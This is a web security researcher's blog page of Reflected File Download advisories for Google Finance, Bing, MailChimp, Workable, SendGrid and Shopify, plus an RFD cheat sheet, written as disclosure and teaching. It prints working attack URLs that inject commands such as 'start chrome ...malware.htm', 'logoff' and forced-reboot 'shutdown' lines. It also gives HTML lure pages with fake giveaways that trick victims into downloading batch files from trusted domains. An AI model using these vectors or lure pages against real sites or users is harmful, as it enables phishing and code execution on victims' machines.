David Sopas – Web Security Researcher


20/04/18 Tools # , , , ,

RFD Checker and Security Assessment Mindset

I recently published two repos on my Github account. One is RFD Checker, which I did with my colleague Paulo Silva, where it scans for Reflected File Download vulnerabilities and the other one is a security mindmap (you can also have other formats). This last one had pretty good success just because it a mindset for helping infosec peers and bug bounty hunters on their assessments.

Feel free to share it and participate on any of the projects. They are open-source and with the help of the infosec community they can become a better tool to your arsenal.


no responses
20/04/18 My Events , News # , ,

Reflected File Download webinar

Reflected File Download webinar

On 13th March I did a webinar for Checkmarx showing in around 30 minutes what is and how you can exploit the web vector Reflected File Download.

You can still watch the recorded version at RFD: Still Threatening the Biggest Names on the Web.

Had a lot of fun doing it because it was my first webinar 🙂 ‘Til next time!

no responses
21/01/16 Advisories # , ,

Google Finance Reflected File Download

Google Finance Reflected File Download

Found this vulnerability when auditing other client. With this RFD you don’t need to create a page to force the download.
The request for this Google JSON file already do this for us.

When I noticed this request:


Which returned the following information:

// [
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"

I wondered if that callback parameter could be manipulated. So I injected “calc” on the request:


Which returned the following information:

"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"

Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:


Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.

I tried successfully with the following browsers:

  • Firefox latest version
  • Opera latest version
  • Internet Explorer 8 and 9

What are the limitations?

I noticed in my testing that most of the chars are being sanitized so it only allows you to use one command without spaces or arguments.

[when the batch is executed the Windows calculator opens]

[when the batch is executed the system logoffs the authenticated user]

Possible attack scenario:

  1. Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
  2. Victim downloads the file and execute it.
  3. After execution of the batch file it will logoff the victim from the operating system.

I made a small video that illustrates my proof-of-concept:

Google decided that this issue has very little or no security impact. Personally I don’t agree but that’s my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.

no responses
19/01/16 Advisories # , , ,

Bing Reflected File Download

Bing Reflected File Download

When using Bing online translator I noticed a XHR request on my browser that caught my attention:


On which reflected on the screen:


As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:


On which reflected on the screen:

start chrome davidsopas.com/poc/malware.htm();

Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.

no responses
06/01/16 Interesting Readings , Tips and Tricks # , , ,

Why some vendors ignore RFD attacks?

Why some vendors ignore RFD attacks?

Since I published my Reflected File Download Cheat Sheet I’m getting lot’s of private messages and emails from security researchers and bounty hunters telling that most companies ignore RFD attacks.
So I decided to clear things up and answer three most popular questions.

First a little introduction.
In my opinion they’re three ways of implementing a successful RFD attack.

  1. URL address automatically prompts the download dialog in most popular browsers
  2. Attack is only available using a external page in modern browsers but works like (1) in Internet Explorer 8 and 9 browsers
  3. Attack is only available using a external page in modern browsers


“Reflected File Download is a social engineering attack.”

On attack scenario (1) the victim is prompted with a download dialog just by visiting/clicking the URL – just like a reflected XSS but here the victim downloads a file from a trusted source. In 90% of the cases the victim runs the file. Imagine having the following URL:

[It’s just an example, this will not work]

If the victim runs the URL it will prompt the download of setup.bat. On Chrome you don’t need to see the source because you see the URL. On Firefox and IE you’ll the the source on the download dialog.

Attack scenario (2) works like (1) in IE 8 and 9. Other browsers need a external page to work using HTML5 download attribute.
The attackers in this last case need to launch a malicious campaign with that link. It’s like phishing emails but here the URL is from a trusted source.

Imagine this attack scenario:

  1. Attacker creates a page with a RFD link to a hosting company
  2. That page offers domain or hosting promo codes
  3. When the victim checks the link (mouse hover or view the source code) it will see that’s from a trusted source [the hosting company]
  4. Victim clicks the link and downloads the file (when they view the source of the download they will see the hosting company)
  5. Victim gets hijacked

On attack scenario (3) it’s the same scenario from (2) but don’t work as told before on IE 8 and 9.

Some may consider (2) and (3) a social engineering attack. The attacker needs to attract victims into his RFD page. For me it’s a grey area. They’re lot’s of ways to bring victims to a malicious page [blackhat seo, forums, social networks] without too much trouble. The key point here is that the RFD URL is from a trusted source which give the victim a little of confidence that they will download something that is what they’re are loooking for.
Companies that ignore this will have their reputation affected because they didn’t do anything to prevent this attack to their clients.


“We can’t do anything about it. It’s a external page that we can’t control.”

Wrong! On (1) you don’t need a external page.
On (2) and (3) the affected companies can protect and prevent RFD attacks by forcing the filename:

content-disposition:attachment; filename="f.txt"

Even if the attacker external page is using:

<a href="http://RFD_URL" download="setup.bat">Click here</a>

It will try to download f.txt.

Workable fix this by using the following:



“Google don’t consider this to be a issue”

Google has a specific page that tells security researchers that Reflected File Download security reports aren’t reliable for a reward.

But at the end of the text you can read the following:

Before sending a report please remember to include a realistic attack scenario, preferably, one that doesn’t require social engineering.

I already sent two (1) issues to Google and they were both accepted. So always give a good attack scenario.

I already helped most popular companies to fix Reflected File Download issues – Yahoo!, eBay, Microsoft, Google, Linkedin and many more.
Keep your security report clear and complete. Don’t argue with the affected company about their opinion. It’s their prerogative to deny your security report. In the end it’s their decision. – Keep calm and carry on!

Have a good and secure year of 2016 🙂

no responses
23/12/15 Advisories # , , ,

MailChimp Reflected File Download

MailChimp Reflected File Download

When auditing a MailChimp client for Cobalt.io I noticed that this company suffers from a Reflected File Download vulnerability that could be exploited only by using HTML5 download attribute.

Let’s take a look into the original GET request:


This request is part of the subscription to a email campaign at MailChimp.
Checking the URL you can see “c” parameter is nothing more than the callback:

?({“result”:”error”,”msg”:”Blank email address”})

Putting my RFD vector on the callback:


I get the following reflected:

start chrome davidsopas.com/poc/malware.htm||({“result”:”error”,”msg”:”Blank email address”})

Because list-manage.com is not URL permissive I needed to use a external page to create my proof-of-concept:

<div align="center">
<a href="http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&id=91d16923d8&c=start%20chrome%20davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;"><img src="https://hfweb-assets.s3.amazonaws.com/integrations/mailchimp.png" border="0" /></a>
<h1>Install MailChimp toolbar to improve your email send score!</h1>
<p><i>(Use "Save Link As" to download the file)</i></p>

So a possible attack scenario would be:

  1. Victim visits a page with a specially crafted page – like my PoC
  2. Victim downloads the file using Save Link As (which comes from a trusted domain – list-manage.com)
  3. Victim gets hijacked

Because the download comes from a trusted domain, victims are tricked to execute files that are not suppose to.
This works perfectly on latest versions of Google Chrome and Opera.


MailChimp considered this issue to be a social engineering attack so they’ll not fix it.
In my opinion this is something that this company could prevent from happening just by adding a header to their request. In the end it’s a MailChimp decision not mine.

When I requested the disclosure of this report MailChimp replied:

We neither condone nor prohibit you from adding this to your security blog.

Hope it helps other companies and security researchers to better understand RFD…

no responses
01/12/15 Advisories # , , ,

Workable Reflected File Download

Workable Reflected File Download

For those who don’t know Workable.com

Workable is affordable, usable hiring software. It replaces email and spreadsheets with an applicant tracking system that your team will actually enjoy using. From building a branded careers page, to posting ads to multiple job boards Workable makes it simple. Browse rich profiles of your candidates and work effectively with your hiring team on a platform that keeps your notes, communication, schedule, comments and analytics in one place. It’s everything you need to hire better.

I first noticed this Reflected File Download when auditing a private program at Cobalt.io.
When entering Workable.com I noticed a XHR request on my Google Inspector:
workable.com/api/accounts/8012?origin=embed which returned the following information:

{"name":"Aesculap Healthcare","description":"","jobs":[]}

Nothing unusual here but when I injected in the URL a “callback” parameter it reflected my injection:

/**/dsopas({"name":"Aesculap Healthcare","description":"","jobs":[]});

This injection gave me the opportunity to launch a RFD attack with following vector:
workable.com/api/accounts/8012?origin=embed&callback=||start chrome davidsopas.com/poc/malware.htm ||

/**/||start chrome davidsopas.com/poc/malware.htm ||({"name":"Aesculap Healthcare","description":"","jobs":[]});

Now that I had my RFD vector reflected on the JSON I needed the filename manipulation. Due to your URL being permissive I could simply add a extension to the filename called and got a batch file:

workable.com/api/accounts/8012.bat?origin=embed&callback=||start chrome davidsopas.com/poc/malware.htm ||

If you call the URL directly on Internet Explorer 9 and 8 you’ll get a file download prompt coming from workable.com.

On Google Chrome and Opera latest versions you need to force the download using the HTML5 download attribute.


So in the proof-of-concept I sent them I was able to execute a new chrome window with a page that simulated malware.

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing Workable enterprise accounts
  2. Victim downloads the file thinking that is from a trusted domain [workable.com]
  3. Malicious user gains control over victims machine

Workable surprised me with a gift thanking me for the responsible disclosure.
Cool guys! 🙂

13-11-2015 Sent the security report to Workable
23-11-2015 Workable replied back with the information that they were fixing it
26-11-2015 Issue is fixed
01-12-2015 Full disclosure

no responses
28/10/15 Advisories , Swag # , ,

SendGrid Reflected File Download

SendGrid Reflected File Download

For those who don’t know who SendGrid is…

SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.

They send over 19 billion emails per month.

When visiting their site I noticed a XHR request on my Google Inspector that caught my attention:


Which returned the following JSON information:


I noticed that the callback was called on the URL so I decided to inject my RFD vector:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||


/**/||start chrome websegura.net/malware.htm||({“status”:”success”,”logged_in”:false});

Now that I could reflect my payload and removed the variables that don’t do anything on my proof-of-concept and try to manipulate the filename without giving a HTTP error:

https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||

For Internet Explorer 8 and 9 you didn’t need anything else.
If you run this last URL it would automatically try to download freecoupons.bat file from sendgrid.com servers.


On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.


A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing SendGrid.com coupon codes
  2. Victim downloads the file thinking that is from a trusted domain [SendGrid.com]
  3. Malicious user gains control over victims machine

SendGrid were always on top of the issue [cool guys] and they were nice enough to send me a awesome t-shirt 🙂

12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that was fixing the issue
29-09-2015 Asked for a update
27-10-2015 SendGrid reported that the issue is fixed

no responses
06/10/15 Papers # , , , ,

Reflected File Download Cheat Sheet

Reflected File Download Cheat Sheet

This article is focused on providing infosec people how to test and exploit a Reflected File Download vulnerability – discovered by Oren Hafif of Trustwave. This vulnerability is not very well known but if well implemented could be very dangerous.
I’ve been writing security reports on RFD since January 2015 (most still undisclosed) and found lot’s of interesting things based on that experience that I would like to share.
I’m not explaining in this cheat sheet what RFD is or make a fancy presentation about it. For that you have Oren Hafif Blackhat presentation and Trustwave paper.


0x1 Where to look

Most of the RFD attacks are found on JSON and JSONP APIs [like auto-complete, user information, search box, order filters, etc.]. Most modern web applications this days use it.
You should start looking into your proxy [Burp, ZAP, etc] or Google Inspector for XHR requests. They’re are usually the prime suspect to find RFD attacks.
Don’t discard other requests like scripts. I already found a RFD attack on a JS file on Google which got me a entry on their Hall-of-Fame.
So keep your eyes open and think outside-the-box.


0x2 How to test it

Try to see if a callback parameter is present on the request:


If callback is present try to change it to calc.


If calc is reflected on the screen it’s a good thing. If not maybe the victim has a whitelist of callbacks. But don’t give up yet. Try to find other parameter that could be reflected.
In my example you can see term parameter. Try to inject the following search term:


If the double-quote is slashed and pipe chars are not encoded you got the attack reflected.


Important: Even if the callback is not present in the request try to inject it. Most of the cases it’s there 🙂

If you can’t inject a callback try to inject the vector on another parameter that is reflected. Take in mind that it should be accessible to anyone not only by you. No Self-RFD in here 🙂

Ok so you have a reflected callback or reflected injected parameter. What we’ll try next is filename manipulation if URL mapping is permissive.

Some things you might try:


You can use other extensions also. Use your imagination. You can use .bat, .cmd, .js, .vbs and even other formats to attack *nix users – http://blog.davidvassallo.me/2014/11/02/practical-reflected-file-download-and-jsonp/


0x3 Can’t get download dialog

If the server don’t have Content-Disposition: attachment header to force the download you must use HTML5 download attribute to do this. On Internet Explorer 8 and 9, which interpret JSON as attachment, it will automatically try to download.

HTML5 download attribute is available in the following browsers:

  • Chrome
  • Firefox (you need to hack it a little to work)
  • Opera

Example 1:

<a href="https://www.example-site.pt/api/setup.bat?callback=chkdsk" download="setup.bat">Download</a>;

In Example 1 you can just click the link Chrome and Opera will download search.bat. On Firefox you must force the “Save link as” by adding on the:

<a href> onclick="return false;"

Example 2:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat">Download</a>;

Just by clicking on the Download link Chrome and Opera will download setup.json. You must force the download with “Save link as” like Firefox. So:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat" onclick="return false">Download</a>

Reminder: Keep noticing what is the returned HTTP code. It must be 200. 401 and 403 will not lead to RFD attacks.


0x4 Real Scenarios (all of them fixed)

Desk @ http://www.davidsopas.com/desk-com-reflected-filename-download/

Desk web app allowed a malicious user to have a direct URL to a malicious download.
Because they had Content-Disposition: attachment header this URL:

Worked in every browser – downloading it without using any other manipulation. An example of a perfect RFD attack.

Acunetix @ https://www.davidsopas.com/acunetix-got-rfded/

Needed to use a special crafted webpage to download the file so this one it’s a nice example of the HTML5 download attribute.

Google @ http://www.websegura.net/advisories/reflected-filename-download-on-google/

This one is to show you guys that you don’t need a JSON file to get a RFD attack. Even a JS file which reflects your information will do the job.


0x5 RFD vectors

If you want to just give a proof-of-concept to a vendor you can just use a innocent calc from Windows or open a Chrome window with your site.
If you want to demonstrate with other vectors I give you a small list:

  • calc [runs Windows calculator]
  • chkdsk [runs Windows check disk utility]
  • start chrome davidsopas.com/poc/malware.htm [open a new chrome window with the defined URL]
  • start chrome davidsopas.com/poc/malware.htm –disable-web-security –disable-popup-blocking [open a new chrome
  • window with security options disabled with the defined URL]
  • shutdown -t 0 -r -f [force a Windows immediate reboot]

Don’t forget that you can use any command you wish depending on the operating system of the victim.


0x6 Bonus tricks

  • Sometimes you may enconter callbacks being filtered for spaces and special chars. If this is the case you can always use a RFD vector that fits this filtering (check 0x5 RFD vectors).
  • If the executable file is a .bat file don’t forget that there’s a limit on it’s content. If the JSON file you are using is too big, the batch file will not run your RFD attack. Try removing some of the parameters to reduce the lenght of the file.
  •  JSON/JSONP error messages sometimes could be your best friend. Some of them reflect the parameters you inject and return a HTTP 200 code.
  • If request header accepts text/html and tags are not filtered you can try inject a callback with HTML and make it a Reflected XSS:

https://www.example-site.pt/api/search.htm?term=f00bar&callback=calc<svg onload=prompt(1)>

  • If you can’t get a reflected vector on the request and you have a URL which is accessible to authenticated users you can use fields to inject the RFD vector.


{"id":"1234567", "name":"David Sopas"}

You can inject your RFD vector:


on your name and use your link to attack.

{"id":"1234567", "name":"\";||calc||"}

This shows that sometimes you don’t even need the callback or parameter on the URL to use a RFD attack.

  • If your .bat don’t run, copy-paste it’s content to cmd.exe and check what it’s going on.
  • Sometimes when you call the XHR URL directly it shows you the file in XML. Add ?format=json and you might get lucky!


0x7 How to fix it

I think the best solution is to use the header Content-Disposition with a defined filename:

Content-Disposition: attachment; filename=1.txt

That way it’s impossible (so far) to modify the filename and most important filename extension.
Also if you use callbacks try to whitelist them. Finally encode (not escape) values reflected on the request.


0x8 Affected sites/companies

Should I be worried about RFD? YES!
Imagine a way of tricking victims into downloading a malicious filename using your domain? It’s very important to think that this is not a social-engineering attack but it only uses part of it (abusing human-factor) to gain trust of your client into downloading a file [that you didn’t upload]
If your client or visitor is not a security expert and is just a normal Internet user he will trust the link, download the file and execute it. People are doing this even without the trusted domain imagine with that option.

Oren Hafif said in his BlackHat presentation:

4 out of 5 would trust downloads based on the hosting domain.
RFD uses trust to do evil.

My advice is… Patch it before it too late.


0x9 Thanks

Oren Hafif -> for discovering this type of vulnerability
David Vassallo -> for showing a *nix version of the RFD attack
Ashar Javed -> for giving me the idea of publishing this cheat sheet about RFD and for calling me “RFD Machine” 🙂


0xA Other related Reflected File Download links

2 responses
29/09/15 Advisories # , , ,

Shopify open to a RFD attack

Shopify open to a RFD attack

Before Shopify having a bounty program on HackerOne I already sent [on 19 march] a security report about a Reflected Filename Download I found on their website.
It doesn’t need any authentication like access_token, api_key or even an account on Shopify.

The problem is located under app.shopify.com service.

On Internet Explorer 9 and 8 browsers if you run the following link:


It will show download dialog with a file named track.bat that after execution it will run Google Chrome with a malicious webpage (in this case it’s only text).
Of course a malicious user could run any operating system command he wishes.

On other browsers like Chrome, Opera, Firefox, Android Browser and Chrome for Android latest versions you need to visit a page which will force the download using HTML5 <A DOWNLOAD> attribute:

<div align="center"> 
<a href="https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=" download="track.bat">
<img src="http://harleyf.com/wp-content/uploads/2010/03/94_shopify.png" border="0" />
</a> <
h1>Shopify is giving away premium service!</h1> 
<p><i>(Firefox users: Use "Save link as" to download the file)</i></p> 

When the victim visits a specially crafted page with the code above and click the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.



So a possible attack scenario will be:

  1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Shopify) he downloads it
  3. Victim runs the file and his computer it’s hijacked

To the victim, the entire process looks like a file is offered for download from Shopify original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems to much.

So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.

19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for a update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for a update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.
25-09-2015 Full disclosure

3 responses